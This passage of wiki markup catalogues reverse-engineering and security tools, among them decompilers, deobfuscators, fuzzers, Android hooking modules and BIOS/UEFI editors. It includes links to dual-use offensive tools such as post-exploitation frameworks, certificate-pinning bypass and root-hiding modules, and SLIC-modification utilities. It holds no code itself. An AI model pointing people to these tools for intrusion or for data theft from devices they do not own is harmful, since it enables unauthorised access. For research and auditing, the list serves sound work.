*[https://www.telerik.com/products/decompiler.aspx Telerik JustDecompile] - is a free .NET decompiler and assembly browser that makes high-quality .NET decompilation easy With an open source decompilation engine.&lt;br /&gt;
&lt;br /&gt;
======.NET deobfuscators======&lt;br /&gt;
&lt;br /&gt;
::*[https://github.com/ViRb3/de4dot-cex de4dot CEx] - is a deobfuscator based on de4dot with full support for vanilla ConfuserEx.&lt;br /&gt;
::*[https://github.com/de4dot/de4dot de4dot] - is a .NET deobfuscator and unpacker.&lt;br /&gt;
::*[https://github.com/NotPrab/.NET-Deobfuscator Lists of .NET deobfuscators and unpackers (Open Source)] - A curated list of open source deobfuscators and more.&lt;br /&gt;
&lt;br /&gt;
======.NET memory dumpers======&lt;br /&gt;
&lt;br /&gt;
::*[https://github.com/wwh1004/ExtremeDumper ExtremeDumper] - is a .NET Assembly Dumper (source code available).&lt;br /&gt;
::*[https://github.com/fremag/MemoScope.Net MemoScope.Net] - is a tool to analyze .Net process memory: it can dump an application's memory in a file and read it later. The dump file contains all data (objects) and threads (state, stack, call stack).&lt;br /&gt;
::*[https://github.com/0x410c/ClrDumper ClrDumper] - is a tool that can dump .NET assemblies and scripts from native clr loaders, managed assembly and vbs, jscript or powershell scripts.&lt;br /&gt;
&lt;br /&gt;
======.NET tracers======&lt;br /&gt;
&lt;br /&gt;
::*[http://www.reteam.org/board/showthread.php?t=939 dotNET Tracer 2.0 by Kurapika] - is a simple tool that has a similar functionality to RegMon or FileMon but it's designed to trace events in .NET assemblies in runtime. [[Media:KDT2.0.zip]] [https://www.virustotal.com/gui/file/d29afcc5115c28f9892f7a6d249423374ad77ac86f69b316665c347982975d02 VT1] [https://www.virustotal.com/gui/file/04cd51dbbc3d2b4fe4a721e4ad0c2f3012fe0f409dc902b430207ea25561ff8c VT2] (thermida packed), pw: recessim.com&lt;br /&gt;
::*[https://github.com/smourier/TraceSpy TraceSpy] - is a open source and free, alternative to the very popular SysInternals DebugView tool.&lt;br /&gt;
&lt;br /&gt;
=====JAVA (JVM) Decompilers=====&lt;br /&gt;
&lt;br /&gt;
:*[https://github.com/Col-E/Recaf Recaf] - Recaf is an open-source Java bytecode editor that simplifies the process of editing compiled Java applications.&lt;br /&gt;
:*[https://www.pnfsoftware.com/ JEB decompiler] - Decompile and debug Android dalvik, Intel x86, ARM, MIPS, RISC-V, S7 PLC, Java, WebAssembly &amp;amp; Ethereum Decompilers.&lt;br /&gt;
&lt;br /&gt;
======JAVA (ART/APK)======&lt;br /&gt;
The tooling you need for Android application reverse engineering of the Java virtual machine bytecode. Traditional Java Virtual Machine (JVM) and Android Runtime (ART) that utilizes AOT compilation over JIT.&lt;br /&gt;
&lt;br /&gt;
:*[https://github.com/skylot/jadx Jadx] - Dex to Java decompiler. Command-line and GUI tools for producing Java source code from Android Dex and apk files.&lt;br /&gt;
:*[https://github.com/honeynet/apkinspector/ APKinspector] - is a powerful GUI tool for analysts to analyze the Android applications.&lt;br /&gt;
:*[https://apktool.org/ Apktool] - A tool for reverse engineering Android apk files.&lt;br /&gt;
:*[https://github.com/androguard/androguard Androguard] - is a full python tool to play with Android files. DEX, ODEX; APK; Android's binary xml; Android resources; Disassemble DEX/ODEX bytecodes.&lt;br /&gt;
:*[https://github.com/Konloch/bytecode-viewer Bytecode viewer] - is a Java 8+ Jar &amp;amp; Android APK Reverse Engineering Suite (Decompiler, Editor, Debugger &amp;amp; More)&lt;br /&gt;
:*[https://github.com/niranjan94/show-java ShowJava] - is an APK (android application), JAR &amp;amp; Dex decompiler for android.&lt;br /&gt;
:*[https://github.com/tp7309/TTDeDroid TTDeDroid] - is a tool for quickly decompiling apk/aar/dex/jar.&lt;br /&gt;
:*[https://github.com/JesusFreke/smali smali/baksmali] - is an assembler/disassembler for the dex format used by dalvik, Android's Java VM implementation. The syntax is loosely based on Jasmin's/dedexer's syntax.&lt;br /&gt;
&lt;br /&gt;
======RASP (Runtime Application Self-Protection) Android======&lt;br /&gt;
To effectively audit applications, testers often intentionally make their devices vulnerable to simplify testing.&amp;lt;br&amp;gt;&lt;br /&gt;
In response, application developers implement countermeasures such as detecting emulators, debuggers, and checking if the device is secure and not rooted.&amp;lt;br&amp;gt;&lt;br /&gt;
The current focus of this technology is on the vulnerabilities of Java and .NET platforms.&lt;br /&gt;
:*[https://arxiv.org/pdf/2312.17726 arXiv:2312.17726 (cs.CR)] - is a paper regarding Interactive Application Security Testing (IAST) and RASP Tools.&lt;br /&gt;
:*[https://github.com/securevale/android-rasp Android-RASP] - is a solution for protecting Android apps against being run on vulnerable devices.&lt;br /&gt;
&lt;br /&gt;
======JAVA deobfuscators (mixed platforms)======&lt;br /&gt;
There is nothing more annoying than coroutines (ProGuard), c-flow, function virtualization, class and name renaming and junk code while decompiling code. Here are a few off the shelf deobfuscators.&lt;br /&gt;
&lt;br /&gt;
:*[https://github.com/CalebFenton/simplify simplify] - Android virtual machine and generic deobfuscator.&lt;br /&gt;
:*[https://github.com/java-deobfuscator/deobfuscator deobfuscator] - is a project that aims to deobfuscate most commercially-available obfuscators for Java. [https://github.com/java-deobfuscator/deobfuscator-gui GUI version github]&lt;br /&gt;
:*[https://github.com/GraxCode/threadtear Threadtear] - is a multifunctional deobfuscation tool for java, ZKM and Stringer support, Android support is in development.&lt;br /&gt;
:*[https://github.com/narumii/Deobfuscator Another Deobfuscator] - Some deobfuscator for java. Supports superblaubeere27 / JObf / sb27, Paramorphism 2.1.2_9, Caesium, Monsey, Skid/qProtect, Scuti, CheatBreaker, Bozar, ...&lt;br /&gt;
&lt;br /&gt;
======JAVA decompilers (platform independent)======&lt;br /&gt;
:*[https://github.com/fesh0r/fernflower Fernflower] - is a powerful open-source Java decompiler that reconstructs readable Java source code from compiled bytecode, widely used and integrated into IntelliJ IDEA.&lt;br /&gt;
&lt;br /&gt;
====Debuggers / Disassemblers for '''unmanaged''' binaries====&lt;br /&gt;
&lt;br /&gt;
=====AutoIt=====&lt;br /&gt;
AutoIt decompilers extract or anything else related to reverse engineering AutoIt binaries.&lt;br /&gt;
:*[https://github.com/JacobPimental/exe2aut exe2aut] - is a tool that converts executable (.exe) files into AutoIt script (.aut) source code, attempting to reverse-engineer compiled AutoIt programs.&lt;br /&gt;
:*[https://github.com/nazywam/AutoIt-Ripper AutoIt-Ripper] - is a short python script that allows for extraction of &amp;quot;compiled&amp;quot; AutoIt scripts from PE executables.&lt;br /&gt;
&lt;br /&gt;
=====VB6=====&lt;br /&gt;
Early .NET applications compile native and p-code meaning there is not a easy way to decompile these like with newer .NET framework exectables. &lt;br /&gt;
:*[https://www.vb-decompiler.org/ VB Decompiler Pro] - is a commercial software tool that decompiles and analyzes programs written in Visual Basic 5.0/6.0 and also .NET for reverse engineering and code recovery purposes.&lt;br /&gt;
&lt;br /&gt;
====Bytecode Decompilers====&lt;br /&gt;
&lt;br /&gt;
=====React Native Hermes=====&lt;br /&gt;
If you plan on looking inside a compiled React Native Asset for doing a security audit, these tools come in handy.&lt;br /&gt;
&lt;br /&gt;
:*[https://github.com/P1sec/hermes-dec hermes-dec] - A reverse engineering tool for decompiling and disassembling the React Native Hermes bytecode.&lt;br /&gt;
:*[https://github.com/Pilfer/hermes_rs hermes_rs] - Bytecode disassembler and assembler.&lt;br /&gt;
:*[https://github.com/bongtrop/hbctool hbctool] - Hermes Bytecode Reverse Engineering Tool (Assemble/Disassemble Hermes Bytecode).&lt;br /&gt;
&lt;br /&gt;
=====Python=====&lt;br /&gt;
To reverse or decompile binaries generated by IronPython, which compiles Python code into Common Intermediate Language (CIL) targeting the Common Language Infrastructure (CLI), you should use decompilation tools designed for managed assemblies rather than traditional Python bytecode tools.&lt;br /&gt;
:*[https://github.com/rocky/python-uncompyle6 uncompyle6] - is a native Python cross-version decompiler and fragment decompiler. The successor to decompyle, uncompyle, and uncompyle2.&lt;br /&gt;
:*[https://github.com/zrax/pycdc pycdc] - is a C++ python bytecode disassembler and decompiler.&lt;br /&gt;
:*[https://github.com/Cisco-Talos/pyrebox PyREBox] - is a Python scriptable Reverse Engineering sandbox by Cisco-Talos. It is based on QEMU, and its goal is to aid reverse engineering by providing dynamic analysis and debugging capabilities from a different perspective.&lt;br /&gt;
:*[https://github.com/snare/voltron Voltron] - is an extensible debugger UI toolkit written in Python. It aims to improve the user experience of various debuggers (LLDB, GDB, VDB and WinDbg) by enabling the attachment of utility views that can retrieve and display data from the debugger host.&lt;br /&gt;
&lt;br /&gt;
=====Lua=====&lt;br /&gt;
:*[https://github.com/scratchminer/unluac unlua] - is a decompiler that converts compiled Lua 5.1 bytecode files (.luac) back into readable Lua source code.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Fuzzers====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/google/honggfuzz Honggfuzz] - Security oriented software fuzzer. Supports evolutionary, feedback-driven fuzzing based on code coverage (SW and HW based).&lt;br /&gt;
&lt;br /&gt;
*[https://llvm.org/docs/LibFuzzer.html LibFuzzer] - LibFuzzer is an in-process, coverage-guided, evolutionary fuzzing engine.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/google/AFL '''(ARCHIVED)''' AFL (American fuzzy lop)] - is a security-oriented fuzzer that employs a novel type of compile-time instrumentation and genetic algorithms to automatically discover clean, interesting test cases that trigger new internal states in the targeted binary.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/AFLplusplus/AFLplusplus AFL++ (AFLplusplus)] - The fuzzer afl++ is afl with community patches, qemu 5.1 upgrade, collision-free coverage, enhanced laf-intel &amp;amp; redqueen, AFLfast++ power schedules, MOpt mutators, unicorn_mode, and a lot more!&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/carolemieux/afl-rb FairFuzz] - is a AFL extension to increase code coverage by targeting rare branches. FairFuzz has a particular advantage on programs with highly nested structure (packet analyzers, xmllint, programs compiled with laf-inte, etc).&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/RUB-SysSec/redqueen RedQueen] - is a fast general purpose fuzzer for x86 binary applications. It can automatically overcome checksums and magic bytes without falling back to complex and fragile program analysis techniques, such as symbolic execution.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/sslab-gatech/qsym '''(ARCHIVED)''' QSYM] - ia a Practical Concolic Execution Engine Tailored for Hybrid Fuzzing.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/puppet-meteor/MOpt-AFL MOpt-AFL] - is a AFL-based fuzzer that utilizes a customized Particle Swarm Optimization (PSO) algorithm to find the optimal selection probability distribution of operators with respect to fuzzing effectiveness. More details can be found in the technical report. The installation of MOpt-AFL is the same as AFL's.&lt;br /&gt;
&lt;br /&gt;
====PC platform exploration frameworks====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/chipsec/chipsec Chipsec] - is a framework for analyzing the security of PC platforms including hardware, system firmware (BIOS/UEFI), and platform components. It includes a security test suite, tools for accessing various low level interfaces, and forensic capabilities.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/rapid7/metasploit-framework Metasploit Framework] - is a Ruby-based Framework, modular penetration testing platform that enables you to write, test, and execute exploit code.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/BC-SECURITY/Empire Empire] - is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/Arachni/arachni Arachni] - is a feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications.&lt;br /&gt;
&lt;br /&gt;
*[https://portswigger.net/burp Burp Suite] - Burp or Burp Suite is a set of tools used for penetration testing of web applications.&lt;br /&gt;
&lt;br /&gt;
====Mobile exploration frameworks====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/MobSF/Mobile-Security-Framework-MobSF MobSF] - Mobile Security Framework (MobSF) is an automated, all-in-one mobile application (Android/iOS/Windows) pen-testing, malware analysis and security assessment framework capable of performing static and dynamic analysis.&lt;br /&gt;
&lt;br /&gt;
*[https://frida.re/ Frida] - Dynamic instrumentation toolkit for developers, reverse-engineers, and security researchers.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/sensepost/objection objection] - is a runtime mobile exploration toolkit, powered by Frida, built to help you assess the security posture of your mobile applications, without needing a jailbreak.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/xtiankisutsa/MARA_Framework MARA] - is a Mobile Application RE and Analysis Framework. It is a toolkit that puts together commonly used mobile application RE and analysis tools to assist in testing mobile applications against the OWASP mobile security threats.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/EntySec/SeaShell SeaShell] - is an iOS post-exploitation framework that enables you to access the device remotely, control it and extract sensitive information.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/mingyuan-xia/AppAudit AppAudit] - is an efficient program analysis tool that detects data leaks in mobile applications. It can accurately find all leaks within seconds and ~200 MB memory.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/canyie/pine Pine] - is a dynamic java method hook framework on ART runtime, which can intercept almost all java method calls in the current process.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/LSPosed/LSPlant LSPlant] - is an Android ART hook library, providing Java method hook/unhook and inline deoptimization.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/LSPosed/LSPosed LSposed] - is a Riru / Zygisk module trying to provide an ART hooking framework which delivers consistent APIs with the OG Xposed, leveraging LSPlant hooking framework.&lt;br /&gt;
&lt;br /&gt;
::LSPosed Module Repository&lt;br /&gt;
:::*[https://github.com/Xposed-Modules-Repo Xposed Modules Repo] - New Xposed(LSPosed) Module Repository.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/ElderDrivers/EdXposed Xposed Framework] - is a framework for mobile exploration hooking and modifying code on the fly. [https://binderfilter.github.io/xposed/ Inline API hooking example].&lt;br /&gt;
&lt;br /&gt;
::Xposed modules&lt;br /&gt;
:::*[https://github.com/Fuzion24/JustTrustMe JustTrustMe] - Art framework hook to patch okHTTP and other common libs to fool the CERT chain in order for Mitmproxy to capture TLS traffic in cleartext.&lt;br /&gt;
:::*[https://github.com/sanfengAndroid/FakeXposed FakeXposed] - Hide xposed, root, file redirection, two-way shielding data detection.&lt;br /&gt;
:::*[https://github.com/ac-pm/SSLUnpinning_Xposed/ SSLUnpinning_Xposed] - Android Xposed Module to bypass SSL certificate validation (Certificate Pinning)..&lt;br /&gt;
&lt;br /&gt;
::Xposed Framework API Development Documentation&lt;br /&gt;
:::*[https://api.xposed.info/reference/packages.html Xposed API Reference] - Javadoc reference of the Xposed Framework API. It's meant for module developers who want to understand which classes and methods they can use.&lt;br /&gt;
&lt;br /&gt;
====Network Inspection====&lt;br /&gt;
&lt;br /&gt;
=====Promiscuous mode eavesdropping TCP/UDP=====&lt;br /&gt;
&lt;br /&gt;
::*[https://github.com/mitmproxy/mitmproxy Mitmproxy] - is an interactive TLS-capable intercepting HTTP proxy for penetration testers and software developers.&lt;br /&gt;
&lt;br /&gt;
::*[https://gitlab.com/wireshark/wireshark Wireshark] - is a network traffic analyzer, or &amp;quot;sniffer&amp;quot;, for Linux, macOS, &amp;amp;#42;BSD and other Unix and Unix-like operating systems and for Windows.&lt;br /&gt;
&lt;br /&gt;
::*[https://github.com/zaproxy/zaproxy Zed Attack Proxy (ZAP)] - is an Open Source &amp;amp; easy to use integrated penetration testing tool for finding vulnerabilities in web applications.&lt;br /&gt;
&lt;br /&gt;
::*[https://github.com/SensePost/Mallet Mallet] - is an intercepting proxy for arbitrary protocols.&lt;br /&gt;
&lt;br /&gt;
::*[https://github.com/Warxim/petep PETEP (PEnetration TEsting Proxy)] - is an open-source Java application for traffic analysis &amp;amp; modification using TCP/UDP proxies. PETEP is a useful tool for performing penetration tests of applications with various application protocols.&lt;br /&gt;
&lt;br /&gt;
=====HTTP(S) Debuggers / Web Debuggers=====&lt;br /&gt;
&lt;br /&gt;
::*[https://portswigger.net/burp Burp Suite] - is a proxy tool which helps to view, interact, modify web requests. Test, find, and exploit vulnerabilities faster with a complete suite of security testing tools.&lt;br /&gt;
&lt;br /&gt;
::*[https://www.httpdebugger.com/ HTTP Debugger Pro] - is a network traffic analyzer tool that captures, displays, and analyzes HTTP and HTTPS traffic between a web browser or application and the internet for debugging and testing purposes.&lt;br /&gt;
&lt;br /&gt;
::*[https://github.com/httptoolkit  HTTP Toolkit] - is a beautiful, cross-platform &amp;amp; open-source HTTP(S) debugging proxy, analyzer &amp;amp; client, with built-in support for modern tools from Docker to Android to GraphQL.&lt;br /&gt;
&lt;br /&gt;
::*[https://github.com/jbittel/httpry httpry] - is a HTTP logging and information retrieval tool written in Perl and C.&lt;br /&gt;
&lt;br /&gt;
::*[https://github.com/requestly/requestly Requestly] - Bring the power of Charles Proxy, Fiddler &amp;amp; Postman together with beautiful, modern UI &amp;amp; collaboration features.&lt;br /&gt;
&lt;br /&gt;
::*[https://telerik-fiddler.s3.amazonaws.com/fiddler/FiddlerSetup.exe Fiddler] - is a Web Debugger is a serviceable web debugging proxy for logging all HTTP(S) traffic linking your computer and the internet, allowing for traffic inspection, breakpoint setting, and more.&lt;br /&gt;
&lt;br /&gt;
=====Other Network Tools=====&lt;br /&gt;
&lt;br /&gt;
::*[https://learn.microsoft.com/en-us/sysinternals/downloads/tcpview tcpview] - is a tool that will enumerate all active TCP and UDP endpoints, resolving all IP addresses to their domain name versions (Windows).&lt;br /&gt;
&lt;br /&gt;
::*[https://www.nirsoft.net/utils/cports.html cports] - is network monitoring software that displays the list of all currently opened TCP/IP and UDP ports on your local Windows computer.&lt;br /&gt;
&lt;br /&gt;
::*[https://www.netresec.com/?page=NetworkMinerSourceCode NetworkMiner] - is an open source network forensics tool that extracts artifacts, such as files, images, emails and passwords, from captured network traffic in PCAP files.&lt;br /&gt;
&lt;br /&gt;
::*[https://linux.die.net/man/8/netstat netstat] - is a Linux CLI tool to print network connections, routing tables, interface statistics, masquerade connections, and multicast memberships.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====BIOS (basic input/output system) firmware modifying software====&lt;br /&gt;
Unified Extensible Firmware Interface (UEFI) &amp;amp; legacy computer BIOS (basic input/output system) firmware modifying software.&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====UEFI=====&lt;br /&gt;
::*[https://github.com/LongSoft/UEFITool UEFITool / UEFIExtract / UEFIFind] - is a UEFI firmware image viewer and editor.&lt;br /&gt;
::*[https://github.com/LongSoft/IFRExtractor-RS IFRExtractor-RS] - is a Rust utility to extract UEFI IFR (Internal Form Representation) data found in a binary file into human-readable text.&lt;br /&gt;
::*[https://github.com/theopolis/uefi-firmware-parser uefi-firmware-parser] - is a cross-platform open source application written in Python. Very tinker-friendly. Can be used in scripts to automate firmware patching.&lt;br /&gt;
::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_5.01_x64.exe AMIBCP_5.01_x64] - AMI BIOS Configuration Program (AMIBCP) is a powerful customization utility that enables OEMs/ODMs to customize the Aptio® ROM image without intervening on the source code. [https://www.virustotal.com/gui/file/58f822028c24bb452e4c0af60118b3db2a492d91dbf477960ac4f595cfded91b VT link]&lt;br /&gt;
::*[https://github.com/tylernguyen/razer15-hackintosh/blob/master/tools/AMIBCP64/AMIBCP64.exe AMIBCP 5.01.0014 x64] [https://www.virustotal.com/gui/file/58f822028c24bb452e4c0af60118b3db2a492d91dbf477960ac4f595cfded91b/details VT link]&lt;br /&gt;
::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_5.02.0023.exe AMIBCP_5.02.0023] [https://www.virustotal.com/gui/file/38f7c54098af1544ddba6324e6d1fea6d1462f422ba021f309ad4445dacd0467 VT link]&lt;br /&gt;
::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_5.02.0031.exe AMIBCP_5.02.0031] [https://www.virustotal.com/gui/file/c7ade67fe0e8f4c22f73ce3168ff6e718086f1eda83cce4c065b4fe49bd5ad99 VT link]&lt;br /&gt;
::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP%205.02.0034.exe AMIBCP 5.02.0034] [https://www.virustotal.com/gui/file/7fe28fb8a7419c95fba428891e5b3914d9e2b365a5a8932da74db52a1c1dabd8 VT link]&lt;br /&gt;
::*[https://github.com/datasone/grub-mod-setup_var grub-mod-setup_var] - a modified grub allowing tweaking hidden BIOS settings. Does not work with newer (2012 &amp;amp; &amp;gt;&amp;gt;) InsydeH2o because of SMM protection or variable locking.&lt;br /&gt;
::*[https://github.com/JamesAmiTw/ru-uefi RU.EFI] - is a UEFI app that allows users to examine and modify UEFI variables within a system's BIOS while the system is running. It's essentially a tool for interacting with and altering firmware settings, and is often used for tasks like unlocking hidden BIOS settings or debugging firmware-related issues. Crashes on newer (2012 &amp;amp; &amp;gt;&amp;gt;) InsydeH2o upon loading from EFI shell possibly because of violating BIOS runtime security policies.&lt;br /&gt;
&lt;br /&gt;
=====BIOS (legacy)=====&lt;br /&gt;
::*[https://forums.mydigitallife.net/threads/tool-to-insert-replace-slic-in-phoenix-insyde-dell-efi-bioses.13194 PhoenixTool] - is a Windows-only freeware GUI application written in C#. Used mostly for SLIC-related modifications, but it not limited to this task. Requires Microsoft .NET 3.5 to work properly. Supports unpacking firmware images from various vendor-specific formats like encrypted HP update files and Dell installers.&lt;br /&gt;
:::'''AMI'''&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_2.25.zip AMIBCP_2.25] [https://www.virustotal.com/gui/file/71050f3db40cc6c0a623d66c8eeb05d0a0818226fd11ed787452f4f540d45204 VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_2.43.zip AMIBCP_2.43] [https://www.virustotal.com/gui/file/efa10cfe5f78c16982abf458eb50a4fde152631ad3b77838bd2013a763045ced VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_3.13.exe AMIBCP_3.13] [https://www.virustotal.com/gui/file/e0a5b1059f04813e72c6d4fa639d32567002fdd86321895b5987224a4518896e VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_3.37.exe AMIBCP_3.37] [https://www.virustotal.com/gui/file/1174e177b28fb7ecbac6c5043a9e8d78ff4756f657ea72369c5fb6b43b1f2623 VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_3.46.exe AMIBCP_3.46] [https://www.virustotal.com/gui/file/84bd5b151286d4181ef26284d96ca49074e18574b8454c51cb0b34013ee5d073 VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_3.47.exe AMIBCP_3.47] [https://www.virustotal.com/gui/file/20d93c6f868d4638676b7cde2c66c5589433c1480250aa0d774c4feef3337507 VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_3.51.exe AMIBCP_3.51] [https://www.virustotal.com/gui/file/0d630b4b9c34d6c7132249a1a7bc3de33b39779fc90d9a367272cf57b4621aed VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_4.53.exe AMIBCP_4.53] [https://www.virustotal.com/gui/file/3f90e402dab9f64cbc4514e18bc2625ec7672da806cd9e0ef2e803b0ce104a01 VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_4.55.exe AMIBCP_4.55] [https://www.virustotal.com/gui/file/451ad821a66e9ea89ee0544ce53cfab887dc0bb662a2de95f0e1aa1663dc6e06 VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_2.22.1.exe MMTOOL_2.22.1] - MMtool stands for Module Management Tool. As one of AMI's BIOS/UEFI utilities, MMTool allows users to manage firmware file modules within the Aptio ROM image. [https://www.virustotal.com/gui/file/cf49f1e742f5cce68152f3c17df29e5c9aa7fb557c432402199159ffda44e007 VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.12.exe MMTOOL_3.12] [https://www.virustotal.com/gui/file/78c3ca427878be5b07058f422914027462d3ac740b0de247169cc0aee4195e3b VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOl_3.19.exe MMTOOl_3.19] [https://www.virustotal.com/gui/file/b4b30c6ff911f18d3383b094628f59aa5ec3b109acd12aaef391acf9720e52af VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.19_Mod_21FiX.exe MMTOOL_3.19_Mod_21FiX] [https://www.virustotal.com/gui/file/66e2717fcac67b073d24916c74bc8d8dd7932b188d20b8b635b511e6195d5855 VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.22.EXE MMTOOL_3.22] [https://www.virustotal.com/gui/file/5616a62d2b50a53490bb705b769ed86bf4b49799663a814fcd1284ebc0bdc62f VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.22_1B_21Fix-BKMOD.EXE MMTOOL_3.22_1B_21Fix-BKMOD] [https://www.virustotal.com/gui/file/5616a62d2b50a53490bb705b769ed86bf4b49799663a814fcd1284ebc0bdc62f VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.22_CN_BKMod.exe MMTOOL_3.22_CN_BKMod] [https://www.virustotal.com/gui/file/f467d75962278a4e01d646cdf8008136912d8a1ddd588c45e2fcee9d7cd17140 VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.23_CN_BKMod.exe MMTOOL_3.23_CN_BKMod] [https://www.virustotal.com/gui/file/9bf846d023312c889069b03f5ab7157e270fc67c5d295e745d0a5f27d12a71de VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.26.exe MMTOOL_3.26] [https://www.virustotal.com/gui/file/c5a64ea7ce2bea8556fa81e0069adbba793181bfaa76f59f4f472f0a471bac98 VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_4.50.0.23.exe MMTOOL_4.50.0.23][https://www.virustotal.com/gui/file/7d0377a72e67e5a71400361416452440826832aeb2c9bebaa578e8af962eaafd VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_5.0.07.exe MMTOOL_5.0.07] [https://www.virustotal.com/gui/file/28049163fd1e3423c42b229a5f6ed877f14e7caf3b794bf7efb970b375e6ff41 VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_5.02.0024.exe MMTOOL_5.02.0024] [https://www.virustotal.com/gui/file/bbc3e75905997ddc05c523e57a72e49bbfcaf84dca64e460f10f8553b7fda9ee VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_5.02.0025.exe MMTOOL_5.02.0025] [https://www.virustotal.com/gui/file/5d05d0bbea720d4b73dc66db55031c2659458696b9f143df3b7e2f43040289cc VT link]&lt;br /&gt;
:::'''Award'''&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/tree/main/Award_Bios_Editor Award Bios Editor] - is a editor for Award bios.&lt;br /&gt;
:::'''InsydeH2O'''&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/Insyde/H2OEZE/x86/H2OEZE_x86_WIN_100.00.02.13.zip H2OEZE_x86_WIN_100.00.02.13] - H2OEZE™: Easy BIOS Editor that helps edit binaries in the BIOS, including Option ROMs, driver binaries, logos, and Setup values. [https://www.virustotal.com/gui/file/9660f1bf9436b258ec5ad857a94fbd0ec1f8fbff8ab22ca1dfcfb5ebbdcedf08 VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/Insyde/H2OEZE/x86/H2OEZE_x86_WIN_100.00.03.04.zip H2OEZE_x86_WIN_100.00.03.04]  [https://www.virustotal.com/gui/file/2a1005803da854693502093445906eb2cccb24947d6828bc1533ba3603c73b0a VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/Insyde/H2OEZE/x64/H2OEZE_x64_WIN_100.00.03.04.rar H2OEZE_x64_WIN_100.00.03.04]  [https://www.virustotal.com/gui/file/20d2d0336d30afd0b1961eb42dc061ce66a6fcfbfba1530e7abd9be883dcb45c VT link]&lt;br /&gt;
:::'''Phoenix'''&lt;br /&gt;
